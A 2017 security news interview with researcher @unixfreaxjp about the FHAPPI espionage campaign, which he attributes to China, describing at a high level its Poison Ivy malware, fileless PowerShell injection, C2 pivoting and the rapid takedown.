Exclusive: Dirty Political Spying Attempt behind the FHAPPI Campaign: all the details in the interview with @unixfreaxjp

Pierluigi Paganini March 21, 2017

The role of China (PRC) in the worldwide cyber espionage game of conditioning political life: when reserved information are brandished against the political opponent.

In the days of testimony of U.S. Federal investigators about the role played during the last year by Russians, their alleged cyber operation is once again under examination.

The mainstream media is bringing up the news of the F.B.I director who is conducting an investigation regarding the deploying of computer hackers to undermine the presidential campaign.

All this is happening two weeks after a dump referred as Vault 7 that reportedly the extensive hacking capabilities of the CIA: iPhones, Android devices, smart TVs and the possibility to turn them into surveillance devices.

Then Russian government and US one are deploying their APT groups: are they the only ones?

That the FHAPPI campaign was really nasty after all, it was clear to everyone: but the fact that the attacker had a political motivation was not immediately understood. Attackers operated with the intent to cause a sort of political scandal.

We have the reason to believe the attackers aimed to make the opponent losing integrity or popularity in the political landscape.

States are sponsoring cyber attacks leveraging specific kind of malware, injecting them in the computer of the victims with methods and techniques ever more sophisticated and spying on the victims to gather sensitive information and power further lethal spear phishing attacks.

It is even more clear that the National CERTs are becoming mandatory in the defence line of any States, they are assuming the role of the front line against such kind of state sponsored activities.

The real questions are:

  • Are they prepared to defeat so sophisticated threats?
  • Are they so fast in recognizing and block this kind of campaigns before they spread wide in their Nations?

Actually, the situation is very complex, we have states with quite different cyber capabilities. Many states haven’t an effective posture in cyber security and are not resilient to such kind of attacks.

The lack of norms of state behavior helps threat actors and rogue states that continue to invest in cyber espionage activities avoiding sanctions of the international community.

Looking at the next G7 Summit that will be held in Italy, we cannot underestimate the great importance of the cyber security issues that will be discussed by participants.

Anyway, at the same meeting we have participants with quite different cyber capabilities and in some cases with a strong long-running cyber partnership, let’s think for example at the Five Eyes Alliance.

USA, UK, and Canada are members of the Five Eyes alliance, Germany has supported the US surveillance program in past, and these countries are probably the most advanced at the G7.

Do you believe they will accept norms of state behavior?

FHAPPI Campaign

Back to the Chinese FHAPPI campaign, we have decided to interview the popular researcher @unixfreaxjp,  head of the notorious MalwareMustDie malware research team.  As usual with few strokes of the brush he will show us a disconcerting reality.

  1. Based on the recent analysis you have conducted, did you see a specific “pattern” related to this APT? Any idea about the attackers’ motivation?

A: I am not at liberty to describe any information of the victim side. But this attack is the prosecution of the long string of cyber attacks occurred in the past and that are targeting the reputation of the targets and their ability to “influence” the political dialogue.
By the way, the malware formed and wrapped tells a lot about what is happening, let’s try to summarize key findings:

  • The attackers are improving the malware functionalities to avoid detection by signature checker during the intrusion and infection phases. They leverage on VB encryption, multiple encoding, and XOR in the first role of shellcode injection.
  • Threat actors are trying to hide the Poison Ivy in any possible way, for instance by injecting shellcode in another shellcode, and using fileless threats.
  • Judging the target, the usage of this Poison Ivy aims to spy or collect private info on the victim’s activity. The attackers operate to damage the reputation of the victims, for this reason, the awareness of these attack patterns is very important.
  • This lead to believe that the preparation phase of the attack is very accurate. The attackers have cleverly examined the victims’ activity BEFORE and DURING the cyber espionage campaign, it is very obvious since the details are all pointed into a certain scope of a target when the data and circumstances are all matched.
  1. Can you describe us the threat actor or the real source of attack? Which are target countries? What do you think about the success chance for this campaign?

    A: PRC (China) is obviously the source of the attack. The analysis allowed to gather clear evidence about the origin of the attack, many concrete facts and not only assumptions (there are more facts that confirmed the involvement of the China, more than what was written). And China targets the “bilateral” opponent sides, I cannot say more than that.
    The chance of success? It’s very high, I must say. The analysis showed that the attackers has already compromised many targets. Attackers thought of everything for this campaign, EVERYTHING. It is better than before.
    If they did not abuse us as “payload center” which is one of their mistakes (grins), and if the VXRL was not making a swift move for asking our cooperation for taking-down request, we all will know this whole scheme a bit later with some more damage.
  1. In the FHAPPI campaign you have spoken about Pivoting, did you see any specific capability of the APT in this sense?

    A: Firstly “pivot” words weren’t coming from the beginning, it came up when the community was deciding the name, and my good friend El Kentaro was just putting the “pivot words” between it.
    In a way it is a multi-tier pivoted effort, the attack involves several users from the FreeHosting Service and each user has a specific target, dates and the whole package for infecting on this bad spying purpose, let’s call it as TIER-1 of the pivoting effort.  Second, the usage of hostname is showing more pivot flexibility purpose in case they want to change, burn or throw-away the C2. This way a TIER-2 for pivot purpose.
    For the TIER-3, the attackers are in purpose abusing a host in other country’s network for the other country’s network for the CNC/C2, and avoiding to use their own country networks for conducting this attack.
    So this is where the pivot words came from.
  1. About the fileless attack, please can you better describe a countermeasure for the CERT?

A: The usage of the PowerSploit is an important sign for us, it shows that a vector to inject process under an adjustable permitted privilege can be done in Windows system (and, well, in other OS too).
But, this case shows us to be alerted to the abuse by the usage of powershell.exe (which is a good tool). The powershell.exe injected shellcode is all the PoisonIvy malware itself, that was where the fileless works are coming.
And it is not necessarily “by powershell.exe”, if you know what I mean.
For APT the countermeasure itself, it is a matter of the action time. We, in security ring in Japan know this. APT is designed not to be easily detected. When you think an APT is spotted and reported, don’t wait until security products releasing the blocking signature, but read reference analysis, historical facts and confirm those all by yourself, is a must for CERT. In this case, Yahoo Incident Team is doing SUPER great response, also our JP-CERT/CC good folks.

  1. How hard it was to convince authority for this APT to take down, after said, there is not much detection to count on?

    A: I used to write fast for a malware analysis, I often reverse engineer malware and wrote it at the same time too. By the time a friend in VXRL reported to us to takedown the source of infection, after immediate communication with authority, following to our trusted community, I decided to write after quick reversing it, to fulfil the takedown mission FAST, yet I keep on tuning the progress to trusted key persons including the law enforcement too. Our community helped a lot, and we move as one.
    It wasn’t taking much time to convince after all people seeing the analysis and to take it down afterward, in less than 24h all malware was cleaned up.
  1. Any kind of suggestions for white hats to keep watching this kind of threat? 

A: Many abuses using the malware that is used for the similar purpose nowadays. There is no specific advice except “to keep stay on alert”. Especially if your country is related or targeting to these types of abuse. The attacker(s) will keep on coming, they will improve, this type of attacks can not be stopped by some “arrests”, and we will just have to be ready to dissect them in their next level.

  1. You added the malware analysis step by step, why? Even though it seems you drew in paper already a complete scheme..specially about shellcode parts..

    A: The process of APT is different than public malware. The data are sensitive, much communication and confirmation has to be made, and so on. Not for the analysis or reversing itself (which was done it the first stage).
    So I just added stuff in steps, upon some ok signs I received.
    Most importantly is this process is an on-going one. There are many important details that I can not ever disclose to anyone. Actually, for the APT malware analysis the data is a bit too much, but we decided to share also to the security community how rude the actor is by conducting this infection. And if the Country A can suffer this, the Country B or C , or D etc which are in the same geographical territory can suffer the same.
  1. Can you describe it more precise about the time frame for this report, analysis, disclosure and takedown?

    A: I can’t describe more than what is already written in the report, it is OPSEC. All I can say is, we took these bad files down in less than 24hours. And people in my country are learning a lot from this matter to improve the takedown time to be faster.

About the Author

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – FHAPPI Campaign, Cyber espionage)

you might also like

leave a comment